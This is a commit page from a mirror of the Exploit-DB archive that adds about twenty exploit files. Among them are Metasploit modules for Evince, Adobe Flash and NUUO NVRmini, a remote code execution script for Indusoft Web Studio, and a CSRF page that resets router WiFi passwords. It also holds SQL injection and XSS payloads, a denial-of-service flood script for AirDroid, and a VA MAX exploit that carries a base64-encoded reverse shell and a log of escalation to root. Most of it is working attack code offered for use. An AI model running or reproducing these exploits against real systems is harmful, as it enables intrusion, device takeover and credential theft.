bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-02-12

Browse source 
21 changes to exploits/shellcodes

KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)
KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)

Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)
Jzip -  Buffer Overflow (PoC) (SEH Unicode)
Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)
Mediacoder 0.8.33 build 5680 - '.m3u'  Buffer Overflow (PoC) (SEH Overwrite)
Mediacoder 0.8.33 build 5680 - '.lst'  Buffer Overflow (PoC) (SEH Overwrite)

STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)
STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)

Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)
Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH)

Netatalk 3.1.12 - Authentication Bypass (PoC)
IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)
Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)
IP-Tools 2.50 - Local Buffer Overflow (PoC)
Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite)

FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)
FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)

Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)
Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)
AirDroid 4.2.1.6 - Denial of Service
FutureDj Pro 1.7.2.0 - Denial of Service
NordVPN 6.19.6 - Denial of Service (PoC)
River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)
IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)
Evince - CBT File Command Injection (Metasploit)
Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure

Netatalk - Bypass Authentication
Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)
NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)
Indusoft Web Studio 8.1 SP2 - Remote Code Execution
Smoothwall Express 3.1-SP4 - Cross-Site Scripting
Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset
IPFire 2.21 - Cross-Site Scripting
MyBB Bans List 1.0 - Cross-Site Scripting
VA MAX 8.3.4 - Authenticated Remote Code Execution
CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting
Webiness Inventory 2.3 - 'email' SQL Injection
This commit is contained in:
Offensive Security 2019-02-12 05:01:49 +00:00
parent e965ded980
commit d622832ea0
20 changed files with 5567 additions and 11 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

95
exploits/android/dos/46337.sh Executable file
View file

@ -0,0 +1,95 @@
#!/bin/bash
# *****************************************************
# * Author: Marcelo Vázquez (aka s4vitar) *
# * AirDroid Denial of Service (DoS) & System Crash *
# *****************************************************
# Exploit Title: AirDroid Remote Denial of Service (DoS) & System Crash
# Date: 2019-02-07
# Exploit Author: Marcelo Vázquez
# Vendor Homepage: https://web.airdroid.com/
# Software Link: https://play.google.com/store/apps/details?id=com.sand.airdroid&hl=en
# Version: AirDroid 4.2.1.6
# Tested on: Android
#Colours
greenColour="\e[0;32m\033[1m"
endColour="\033[0m\e[0m"
redColour="\e[0;31m\033[1m"
blueColour="\e[0;34m\033[1m"
yellowColour="\e[0;33m\033[1m"
purpleColour="\e[0;35m\033[1m"
turquoiseColour="\e[0;36m\033[1m"
grayColour="\e[0;37m\033[1m"
trap ctrl_c INT
function ctrl_c() {
echo -e "\n\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour}Exiting...${endColour}\n" && tput cnorm
pkill curl > /dev/null 2>&1
exit
}
function check_host(){
# Target availability detection
echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking host availability...${endColour}" && sleep 1
ping -c 1 $host > /dev/null 2>&1
if [ "$(echo $?)" == "0" ]; then
echo -e "\n\t${greenColour}--${endColour}${redColour} Host is active${endColour}${greenColour} --${endColour}\n"
else
echo -e "\n\t${greenColour}--${endColour}${redColour} Host is inactive${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
fi
echo -e "${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${grayColour} Checking if port is open...${endColour}" && sleep 1
if [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ] && [ "$(nmap -p$port $host -sC -sV | grep -i airdroid)" ]; then
echo -e "\n\t${greenColour}--${endColour}${redColour} Port${endColour}${grayColour} $port${endColour}${redColour} is open!!${endColour}${greenColour} --${endColour}\n"
echo -e "\t${greenColour}--${endColour}${redColour} ${endColour}${turquoiseColour}Airdroid Service${endColour}${redColour} detected !!${endColour}${greenColour} --${endColour}\n"
elif [ "$(nmap -p$port --open -T5 -v -n $host | grep open)" ]; then
echo -e "\n\t${greenColour}--${endColour}${redColour} Port is open but it does not correspond to the ${endColour}${turquoiseColour}Airdroid service${endColour}${redColour}!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
else
echo -e "\n\t${greenColour}--${endColour}${redColour} Port is closed!!${endColour}${greenColour} --${endColour}\n" && tput cnorm && exit
fi
}
function banner()
{
sleep 0.2 && echo -e "\n$redColour /\ $endColour"
sleep 0.2 && echo -e "$redColour / \ $endColour"
sleep 0.2 && echo -e "$redColour | | $endColour $yellowColour[${endColour}${grayColour}AirDroid Denial of Service (DoS) [System Crash]${endColour}${yellowColour}]${endColour}"
sleep 0.2 && echo -e "$redColour | | $endColour ${yellowColour}Author:${endColour}${grayColour} Marcelo Vázquez (aka s4vitar)${endColour}"
sleep 0.2 && echo -e "$redColour / == \ $endColour"
sleep 0.2 && echo -e "$redColour |/**\| $endColour"
sleep 0.2 && for i in $(seq 1 70); do echo -ne "${redColour}-${endColour}"; done && sleep 1 && echo
}
if [ "$(echo $#)" == "2" ]; then
tput civis && banner
host=$1 && port=$2
echo && check_host
# Path to launch the message box on the mobile device
url="http://$host:$port/sdctl/comm/lite_auth/"
tput cnorm && echo -ne "${yellowColour}You want to start the attack?${endColour}${grayColour} <${endColour}${redColour}y${endColour}${turquoiseColour}/${endColour}${blueColour}n${endColour}${grayColour}>${endColour}${grayColour}:${endColour} " && read attack_response
if [ "$(echo $attack_response)" == "y" ]; then
counter=0
# Start launch attack of the message boxes, so the Application crash and the device freezes
tput civis && while true; do
for i in $(seq 1 3000); do
curl --silent "$url" &
let counter+=1
done && wait
echo -e "\n${yellowColour}[${endColour}${redColour}*${endColour}${yellowColour}]${endColour}${redColour} $counter${endColour}${grayColour} requests successfully sent${endColour}${redColour}!!${endColour}"
done
else
:
fi
else
echo -e "\n${blueColour}Usage: ${endColour}${redColour}./airdroid_dos.sh ${endColour}${yellowColour}<${endColour}${grayColour}ip_address${endColour}${yellowColour}>${endColour}${yellowColour} <${endColour}${grayColour}port${endColour}${yellowColour}>${endColour}\n"
fi

1780
exploits/cgi/webapps/46333.txt Normal file
View file

File diff suppressed because it is too large Load diff

2649
exploits/cgi/webapps/46344.txt Normal file
View file

File diff suppressed because it is too large Load diff

35
exploits/hardware/webapps/46336.html Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Coship Wireless Router Wireless SSID Unauthenticated Password Reset
# Date: 07.02.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (WiFi Router)
# Affected Versions *: *Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-7564
#POC :
# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on “Submit request”
# The password of the Wireless SSID will be changed to "password"
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/regx/wireless/wl_security_2G.asp
<http://router-ip/regx/wireless/wl_security_2G.asp>" method="POST">
<input type="hidden" name="wl&#95;wep" value="disabled" />
<input type="hidden" name="wl&#95;auth&#95;mode" value="none" />
<input type="hidden" name="page" value="wl&#95;security&#95;2G&#46;asp" />
<input type="hidden" name="wl&#95;unit" value="0" />
<input type="hidden" name="action" value="Apply" />
<input type="hidden" name="wl&#95;auth" value="0" />
<input type="hidden" name="wl&#95;akm" value="psk&#32;psk2" />
<input type="hidden" name="wl&#95;crypto" value="tkip&#43;aes" />
<input type="hidden" name="wl&#95;wpa&#95;gtk&#95;rekey" value="0" />
<input type="hidden" name="wl&#95;wpa&#95;psk" value="password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

108
exploits/linux/local/46341.rb Executable file
View file

@ -0,0 +1,108 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Evince CBT File Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Evince
before version 3.24.1 when opening comic book `.cbt` files.
Some file manager software, such as Nautilus and Atril, may allow
automatic exploitation without user interaction due to thumbnailer
preview functionality.
Note that limited space is available for the payload (<256 bytes).
Reverse Bash and Reverse Netcat payloads should be sufficiently small.
This module has been tested successfully on evince versions:
3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felix Wilhelm', # Discovery
'Sebastian Krahmer', # PoC
'Matlink', # Exploit
'bcoles' # Metasploit
],
'References' =>
[
['BID', '99597'],
['CVE', '2017-1000083'],
['EDB', '45824'],
['URL', 'https://seclists.org/oss-sec/2017/q3/128'],
['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],
['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],
['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],
['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 215,
'BadChars' => "\x00\x0a\x0d\x22",
'DisableNops' => true
},
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_bash',
'DisablePayloadHandler' => true
},
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => '2017-07-13',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])
])
end
def exploit
ext = %w[png jpg gif]
path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"
# Tar archive max path length is 256.
if path.length > 256
fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
end
# Tar archive max file name length is 100.
path.split('/').each do |fname|
if fname.length > 100
fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
end
end
# Create malicious tar archive
tarfile = StringIO.new
Rex::Tar::Writer.new tarfile do |tar|
tar.add_file path, 0644 do |io|
io.write ''
end
# Pad file to 1+ MB to trigger tar checkpoint action
tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
io.write rand_text(1_000_000..1_100_000)
end
end
tarfile.rewind
cbt = tarfile.read
print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
file_create cbt
end
end

20
exploits/linux/webapps/46349.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: CentOS Web Panel 0.9.8.763 - Stored Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 10 - January - 2019
# Exploit Author: DKM
# Vendor Homepage: http://centos-webpanel.com
# Software Link: http://centos-webpanel.com
# Version: v0.9.8.763
# Tested on: CentOS 7
# CVE : CVE-2019-7646
# Description:
A Stored Cross Site Scripting vulnerability is found in the "Package Name" Field within the 'Add a Package (add_package)' module. This is because the application does not properly sanitize the users input.
# Steps to Reproduce:
1. Login into the CentOS Web Panel using admin credential.
2. From Navigation Click on "Packages" -> then Click on "Add a Package"
3. In "Package Name" field give payload as: <script>alert(1)</script> and provide other details and click on "Create"
4. Now again from Navigation Click on "Packages" -> then Click on "List Packages"
5. Now one can see that the XSS Payload executed.

0
exploits/multiple/remote/46048.py → exploits/multiple/dos/46048.py
View file

136
exploits/multiple/remote/46342.py Executable file
View file

@ -0,0 +1,136 @@
##
# Exploit Title: Indusoft Web Studio Unauthenticated RCE
# Date: 02/04/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.indusoft.com/
# Software http://www.indusoft.com/Products-Downloads/Download-Library
# Version: 8.1 SP2 and below
# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app
# CVE : CVE-2019-6545 CVE-2019-6543
# Advisory:
https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01
# Advisory: https://www.tenable.com/security/research/tra-2019-04
##
import argparse
import threading
import socket
from struct import *
import time
import sys
from impacket import smbserver
##
# The SMB Server function. Runs on its own thread.
# @param lip the listening IP address
##
def smb_server(lip):
server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
server.addShare('LOLWAT', '.', '')
server.setSMBChallenge('')
server.setLogFile('/dev/null')
server.start()
##
# Converts a normal string to a utf 16 with a length field.
# @param s the string to convert
##
def wstr(s):
slen = len(s)
s = s.encode('utf_16_le')
out = '\xff\xfe\xff'
if slen < 0xff:
out += pack('<B', slen) + s
elif slen < 0xffff:
out += '\xff' + pack('<H', slen) + s
else:
out += '\xff\xff\xff' + pack('<L', slen) + s
return out
if __name__ == '__main__':
top_parser = argparse.ArgumentParser(description='test')
top_parser.add_argument('--cip', action="store", dest="cip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('--cport', action="store", dest="cport",
type=int, help="The port to connect to", default="1234")
top_parser.add_argument('--lip', action="store", dest="lip",
required=True, help="The address to connect back to")
args = top_parser.parse_args()
# Connect to the remote agent
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.cip + ":" + str(args.cport)
sock.settimeout(15)
sock.connect((args.cip, args.cport))
print "[+] Connected!"
# spin up the SMB server thread
print "[+] Spinning up the SMB Server"
smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
smb_thread.daemon = True;
smb_thread.start()
# drop the xdc file
print "[+] Creating the DB.xdc file"
xdc = open("./DB.xdc", "w+")
xdc.write(
"<?xml version=\"1.0\"?>\n"
"<Connection>\n"
"\t<ConnectionString>{WinExec(\"calc.exe\")}</ConnectionString>\n"
"\t<User></User>\n"
"\t<TimeOut>2</TimeOut>\n"
"\t<LongTimeOut>5</LongTimeOut>\n"
"\t<HostName>127.0.0.1</HostName>\n"
"\t<TCPPort>3997</TCPPort>"
"\t<Flags>0</Flags>\n"
"\t<RetryInterval>120</RetryInterval>\n"
"</Connection>\n")
xdc.close()
print "[+] Sending the connection init message"
init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03"
sock.sendall(init_conn)
resp = sock.recv(1024)
print '<- ' + resp
# do a basic validation of the response
if (len(resp) > 0 and resp[len(resp) - 1] == '\x03'):
print "[+] Received an init response"
else:
print "[-] Invalid init response. Exiting..."
sock.close()
sys.exit(0)
# Craft command 66
cmd = wstr('CO') # options: EX, CO, CF, CC
cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB') # file to load
cmd += wstr('')
cmd += wstr('')
cmd += wstr('')
cmd += wstr('lolwat')
cmd += pack('<L', 0x3e80)
cmd += pack('<L', 0)
cmd += pack('<L', 100)
cmd = '\x02\x42' + cmd + '\x03'
# Send it to the agent
print "[+] Sending command 66"
sock.sendall(cmd)
print "[+] Grabbing the command response"
resp = sock.recv(1024)
print '<- ' + resp
if resp.find("Format of the initialization string does not conform to
specification starting at index 0".encode('utf_16_le')) != -1:
print '[+] Success! We received the expected error message.'
else:
print '[-] Unexpected error message. Something went wrong.'
print '[+] Disconnecting'
sock.close()
print '[+] Wait while the agent disconnects from the SMB server...'
sys.exit(0)

127
exploits/osx/remote/46339.rb Executable file
View file

@ -0,0 +1,127 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
'Description' => %q(
This module exploits a type confusion on Adobe Flash Player, which was
originally found being successfully exploited in the wild. This module
has been tested successfully on:
macOS Sierra 10.12.3,
Safari and Adobe Flash Player 21.0.0.182,
Firefox and Adobe Flash Player 21.0.0.182.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Genwei Jiang', # FireEye original blog details on the vulnerability
'bcook-r7' # Imported Metasploit module
],
'References' =>
[
['CVE', '2016-4117'],
['BID', '90505'],
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
['URL', 'http://www.securitytracker.com/id/1035826'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['osx'],
'BrowserRequirements' =>
{
source: /script|headers/i,
os_name: lambda do |os|
os =~ OperatingSystems::Match::MAC_OSX
end,
ua_name: lambda do |ua|
case target.name
when 'Mac OS X'
return true if ua == Msf::HttpClients::SAFARI
return true if ua == Msf::HttpClients::FF
end
false
end,
flash: lambda do |ver|
case target.name
when 'Mac OS X'
return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
end
false
end
},
'Targets' =>
[
[
'Mac OS X', {
'Platform' => 'osx',
'Arch' => ARCH_X64
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 27 2016',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri.end_with? 'swf'
print_status('Sending SWF...')
send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(3..7)}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
if target.name.include? 'osx'
platform_id = 'osx'
end
html_template = %(<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
</object>
</body>
</html>
)
return html_template, binding
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
File.binread(path)
end
end

87
exploits/php/remote/46340.rb Executable file
View file

@ -0,0 +1,87 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',
'Description' => %q{
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur', # @berkdusunur
'numan turle' # @numanturle
],
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
}}
)
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200 && res.body =~ /upload_tmp_dir/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';"+cmd+";'"
}}
)
unless res
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end
end

23
exploits/php/webapps/46347.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: MyBB Bans List - Cross Site Scripting
# Date: 7/25/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=423
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-14724
1. Description:
Adds bans.php page, showing a list of banned users and the reason of ban.
Any forum user that's a mod can ban users and input a payload into the ban reason which gets executed on the bans.php page.
2. Proof of Concept:
- Have a mod account
- Ban a user
- Input the following for reason of the ban <script>alert('XSS')</script>
- Anyone to view page will execute payload

99
exploits/php/webapps/46348.py Executable file
View file

@ -0,0 +1,99 @@
root@nippur:/home/c/src/nippur# cat vamax3.py
#!/usr/bin/env python
# quick poc for postauth rce bug in va max 8.3.4
#
# more:
# https://code610.blogspot.com
#
# 10.02.2019
#
# p.s.
#
# listening on [any] 4444 ...
# 192.168.1.126: inverse host lookup failed: Unknown host
# connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
# sh: no job control in this shell
# sh-4.1$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
# sh-4.1$ cat /etc/shadow
# cat /etc/shadow
# cat: /etc/shadow: Permission denied
# sh-4.1$
# (...)
# sh-4.1$ sudo -l
# sudo -l
# Matching Defaults entries for apache on this host:
# syslog_goodpri=debug, env_reset,
# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
#
# User apache may run the following commands on this host:
# (ALL) NOPASSWD: ALL
# sh-4.1$ sudo su
# sudo su
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# head -n1 /etc/shadow
# root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
#
#
# o/
import datetime, time
import requests
from requests.auth import HTTPBasicAuth
# defines
dateTime = datetime.datetime.now()
timestamp = int(time.mktime(dateTime.timetuple()))
remote_host = 'http://192.168.1.126:9080'
our_user = 'loadbalancer'
our_passwd = 'loadbalancer'
# go
sess = requests.session()
logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
logmeresp = logme.text
print '\n\tsmall poc for VA MAX 8.3.4\n'
# try to log in
if '<title>Load Balancer Administration System' in logmeresp:
print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
print '[+] our timestamp: %s' % ( timestamp )
print '[+] proceed.'
getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
getmeresp = dogetme.text
payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"
#payload = "h4x;telnet 192.168.1.160 4444;#"
#payload = ';id>/tmp/id.id.id'
# print '[i] using payload:', payload
data_req = {
'eth0' : '192.168.1.126/24',
'mtu_eth0' : '1500' + payload, # >.<
'eth1' : '',
'mtu_eth1' : '1500',
'eth2' : '',
'mtu_eth2' : '1500',
'eth3' : '',
'mtu_eth3' : '1500',
'go' : 'Configure+Interfaces'
}
shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
shResp = shellWe.text
# check sudo -l now :>
print '\n\nThanks.Bye.\n'

46
exploits/php/webapps/46350.txt Normal file
View file

@ -0,0 +1,46 @@
===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'email' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: hhttps://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Small stock inventory managment application for web.
===========================================================================================
# POC - SQL
# Parameters : email
# Attack Pattern :
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
# POST Request:
http://localhost/webiness/index.php?request=Wsauth/login/[SQL]
# https://i.hizliresim.com/ADObQ7.jpg
=========================================================================
POST /webiness/index.php?request=Wsauth/login/ HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 458
Content-Type: multipart/form-data; boundary=54a535315dda429db2f07895827ff1c6
Cookie: PHPSESSID=6e5836p7djilmbh3bunro0ohu0
Referer: http://localhost/webiness/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36
--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="email"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT
COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
--54a535315dda429db2f07895827ff1c6
Content-Disposition: form-data; name="password"
--54a535315dda429db2f07895827ff1c6--

32
exploits/windows/dos/46338.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: FutureDj Pro Local Dos Exploit
# Date: 07.02.2019
# Vendor Homepage: https://www.xylio.com
# Software Link: https://www.xylio.com/future-dj-pro-a-new-level-of-mixing-perfection/
# Exploit Author: Achilles
# Tested Version: 1.7.2.0 32bit
# Tested on: Windows 7 SP1 Ultimate
# 1.- Run python code : FutureDj Pro.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open future.dj.exe
# 4.- In the New Window click start Free Trial and then 'Click here to Buy'
# 5.- And then 'i already bought it'
# 6.- Paste the Content of EVIL.txt into the 'Unlock key' Name field.
# 7.- Click 'OK'
# 8.- Click 'OK'
# 9.- Click 'Exit'
# 10.- And you will see a crash
#!/usr/bin/env python
buffer = "\x41" * 5000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

22
exploits/windows/dos/46343.py Executable file
View file

@ -0,0 +1,22 @@
# -*- coding: utf-8 -*-
# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC)
# Date: 07/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://nordvpn.com/
# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Version: 6.19.6
# Tested on: Windows 10
